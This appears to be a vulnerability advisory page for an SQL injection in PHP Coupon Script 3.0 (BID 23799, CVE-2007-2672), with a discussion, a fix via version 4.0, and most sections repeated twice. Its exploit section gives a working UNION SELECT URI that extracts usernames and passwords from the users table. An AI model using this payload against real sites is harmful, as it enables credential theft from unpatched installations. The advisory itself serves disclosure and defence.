PHP Coupon Script Index.PHP SQL Injection Vulnerability
BID:23799
Info
PHP Coupon Script Index.PHP SQL Injection Vulnerability
| Bugtraq ID: | 23799 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-2672 |
| Remote: | Yes |
| Local: | No |
| Published: | May 03 2007 12:00AM |
| Updated: | May 07 2015 05:39PM |
| Credit: | Cyber-Security.org is credited with the discovery of this vulnerability. |
| Vulnerable: |
Thinc4orce Marketing Group PHP Coupon Script 3.0 |
| Not Vulnerable: |
Thinc4orce Marketing Group PHP Coupon Script 4.0 |
Discussion
PHP Coupon Script Index.PHP SQL Injection Vulnerability
PHP Coupon Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
This issue affects PHP Coupon Script 3.0; other versions may also be affected.
PHP Coupon Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
This issue affects PHP Coupon Script 3.0; other versions may also be affected.
Exploit / POC
PHP Coupon Script Index.PHP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?page=viewbus&bus=-1/**/union/**/select/**/null,null,null,username,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/users/*
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?page=viewbus&bus=-1/**/union/**/select/**/null,null,null,username,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/users/*
Solution / Fix
PHP Coupon Script Index.PHP SQL Injection Vulnerability
Solution:
The vendor has released PHP Coupon Script 4.0 to address this issue. Contact the vendor for details on obtaining and applying the appropriate updates.
Solution:
The vendor has released PHP Coupon Script 4.0 to address this issue. Contact the vendor for details on obtaining and applying the appropriate updates.
References
PHP Coupon Script Index.PHP SQL Injection Vulnerability
References:
References:
- PHP Coupon Script Homepage (Thinc4orce Marketing Group)